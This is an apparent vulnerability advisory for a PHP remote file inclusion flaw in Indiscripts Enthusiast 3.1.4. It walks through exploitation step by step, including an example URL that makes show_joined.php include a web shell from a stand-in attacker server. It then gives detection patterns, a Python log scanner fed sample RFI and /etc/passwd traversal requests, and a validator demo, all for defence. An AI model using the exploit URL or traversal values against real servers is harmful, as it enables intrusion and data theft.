Source: cve@mitre.org
PHP remote file inclusion vulnerability in show_joined.php in Indiscripts Enthusiast 3.1.4, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the path parameter. NOTE: the researcher also points out the analogous directory traversal issue.
Indiscripts Enthusiast 3.1.4, and potentially earlier versions, is vulnerable to remote file inclusion (RFI): show_joined.php passes its path parameter to an include without validating it, so an unauthenticated remote attacker can make the server fetch and execute PHP code of the attacker's choosing. That code runs with the privileges of the web server process, which in practice gives the attacker control over the application and frequently the underlying host, leading to data breaches and system compromise.
Step 1: Identify Vulnerable Target: The attacker identifies a web server running Indiscripts Enthusiast 3.1.4 or earlier.
Step 2: Craft Malicious Payload: The attacker creates a malicious PHP script (e.g., a web shell) hosted on a server they control.
Step 3: Construct Exploit URL: The attacker crafts a URL that exploits the RFI vulnerability in show_joined.php. The URL includes the path parameter, pointing to the attacker's malicious script. For example: http://vulnerable-server/show_joined.php?path=http://attacker-server/malicious.php
Step 4: Exploit Execution: The attacker sends the crafted URL to the vulnerable server.
Step 5: Code Execution: The show_joined.php script, due to the lack of input validation, includes the attacker's malicious PHP script from the specified URL.
Step 6: System Compromise: The attacker's malicious script executes on the server, granting them control over the system, potentially including the ability to read sensitive data, modify files, or execute further commands.
The vulnerability stems from a lack of input validation on the path parameter within the show_joined.php script. The script includes the file named by the path parameter directly, without sanitization or filtering, so a value that is a URL pointing to a PHP script on an attacker-controlled server is fetched and executed, giving arbitrary code execution. The analogous directory traversal issue arises from the same missing check: ../ sequences in the path parameter let the script include local files outside its intended directory, exposing their contents.
While no specific APTs are definitively linked to this CVE, the nature of RFI vulnerabilities makes them attractive to a wide range of attackers, from script kiddies to more sophisticated actors. This vulnerability is not listed on the CISA KEV at the time of this report, but it is a high-severity vulnerability that could be used by any actor.
Monitor web server access logs for suspicious requests to show_joined.php with the path parameter containing external URLs.
Analyze network traffic for HTTP requests containing the pattern show_joined.php?path=http:// or similar patterns (other URL schemes such as https://, ftp:// or php://, traversal sequences such as ../, and URL-encoded variants of either).
Implement file integrity monitoring to detect changes to critical system files.
Use a web application firewall (WAF) to block requests containing malicious payloads or suspicious patterns.
Monitor for unusual PHP processes or shell executions on the server.
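The log-review items above can be turned into a small scanner. The following is an added example written for this page, not tooling from Indiscripts or from the original advisory; the log lines are constructed samples in the Apache/nginx combined format, the IP addresses are documentation ranges, and the set of URL schemes flagged is an assumption based on the stream wrappers PHP accepts in include(). It decodes the path parameter (including double-encoded forms) before matching, so encoded variants of the patterns described above are not missed.

```python
"""Flag RFI and traversal attempts against show_joined.php in web server access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format; only the fields used for reporting are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed set of schemes/wrappers worth flagging in an include() argument.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?|file|php|data|expect|phar):', re.I)
# A ".." path segment at the start of the value or between separators.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def classify_path_value(value):
    """Return 'rfi', 'traversal' or None for one value of the path parameter."""
    # Decode twice so that %252e%252e-style double encoding is also caught.
    decoded = unquote(unquote(value))
    if REMOTE_SCHEME_RE.match(decoded):
        return "rfi"
    if TRAVERSAL_RE.search(decoded) or "\x00" in decoded:
        return "traversal"
    return None


def scan_access_log(lines):
    """Return (ip, timestamp, kind, raw_value) for each hostile request to show_joined.php."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith("/show_joined.php"):
            continue
        # parse_qs applies one level of percent-decoding; classify_path_value decodes again.
        for value in parse_qs(parts.query, keep_blank_values=True).get("path", []):
            kind = classify_path_value(value)
            if kind:
                findings.append((m.group("ip"), m.group("ts"), kind, value))
    return findings


# Constructed sample log: two RFI attempts (one percent-encoded), one traversal, two benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /fan/show_joined.php?path=http://198.51.100.7/shell.txt HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2006:13:55:40 +0000] "GET /fan/show_joined.php?path=%68ttp%3A%2F%2F198.51.100.7%2Fshell.txt HTTP/1.1" 200 512
198.51.100.9 - - [10/Oct/2006:14:01:02 +0000] "GET /fan/show_joined.php?path=../../../../etc/passwd HTTP/1.1" 200 1847
192.0.2.44 - - [10/Oct/2006:14:02:15 +0000] "GET /fan/show_joined.php?path=members HTTP/1.1" 200 2210
192.0.2.44 - - [10/Oct/2006:14:02:18 +0000] "GET /fan/index.php HTTP/1.1" 200 3100
"""

if __name__ == "__main__":
    for ip, ts, kind, value in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} {kind:<9} path={value!r}")
```

Run against a real log with `scan_access_log(open("access.log"))`; the returned tuples carry enough context to pivot on the source address and time window in a SIEM. Only the path parameter is inspected, so a WAF or log pipeline that normalises encodings first will not cause double counting.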
Upgrade to a patched version of Indiscripts Enthusiast or a version that is no longer vulnerable.
Implement input validation and sanitization on the path parameter in show_joined.php to ensure that only local files are included and that the input is properly escaped.
Disable the allow_url_fopen directive in the php.ini configuration file to prevent remote file inclusion (on PHP 5.2 and later, allow_url_include is the directive that specifically governs include/require of URLs and should be off as well).
Use a web application firewall (WAF) to filter malicious requests.
Regularly scan the system for vulnerabilities.
Implement a defense-in-depth strategy, including least privilege access and regular security audits.
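The input-validation mitigation above (include only local files, and only the ones the application expects) is shown here as an added example, written in Python for this page rather than taken from Indiscripts Enthusiast; the include directory, the file names "members" and "joined" and the ".php" suffix are assumptions standing in for whatever show_joined.php actually loads. The check is two independent layers: an allow-list on the submitted name, and a real-path containment test after symlinks are resolved, so that neither a URL nor a traversal sequence can reach the include call.

```python
"""Resolve a user-supplied 'path' value to a file inside a fixed include directory, or refuse it."""
import os
import re
import shutil
import tempfile

# Layer 1: only short, unqualified names are ever looked up (no scheme, no separators, no dots).
SAFE_NAME_RE = re.compile(r'[A-Za-z0-9_-]{1,64}')


class IncludeRejected(ValueError):
    """Raised when the submitted value must not be passed to include()."""


def resolve_include(base_dir, user_value, allowed=None):
    """Return the absolute path of <base_dir>/<user_value>.php if it is safe to include.

    allowed: optional explicit set of permitted names; when given, the name must be in it.
    """
    if not SAFE_NAME_RE.fullmatch(user_value):
        raise IncludeRejected("unexpected characters in path parameter")
    if allowed is not None and user_value not in allowed:
        raise IncludeRejected("name not in include allow-list")
    # Layer 2: resolve symlinks and confirm the result is still under the include directory.
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, user_value + ".php"))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise IncludeRejected("resolved path escapes include directory")
    if not os.path.isfile(candidate):
        raise IncludeRejected("no such include")
    return candidate


def demo():
    """Build a throwaway include directory with two pages and exercise the check.

    Returns a mapping from each submitted path value to 'accepted' or the rejection reason.
    """
    base = tempfile.mkdtemp(prefix="enthusiast_inc_")  # constructed sample directory
    try:
        for name in ("members", "joined"):
            with open(os.path.join(base, name + ".php"), "w") as fh:
                fh.write("<?php /* constructed sample include */ ?>\n")
        submitted = (
            "members",                          # legitimate page
            "joined",                           # legitimate page
            "http://198.51.100.7/shell.txt",    # remote file inclusion attempt
            "../../etc/passwd",                 # directory traversal attempt
            "members\x00",                      # null-byte truncation attempt
            "admin",                            # well-formed name that is not on the allow-list
        )
        results = {}
        for value in submitted:
            try:
                resolve_include(base, value, allowed={"members", "joined"})
                results[value] = "accepted"
            except IncludeRejected as exc:
                results[value] = str(exc)
        return results
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for value, outcome in demo().items():
        print(f"{value!r:40} -> {outcome}")
```

The allow-list alone would already stop every hostile value in the demo; the real-path check is kept because it also protects against a later change to the regex or a symlink dropped into the include directory, which is the defense-in-depth the last mitigation item calls for.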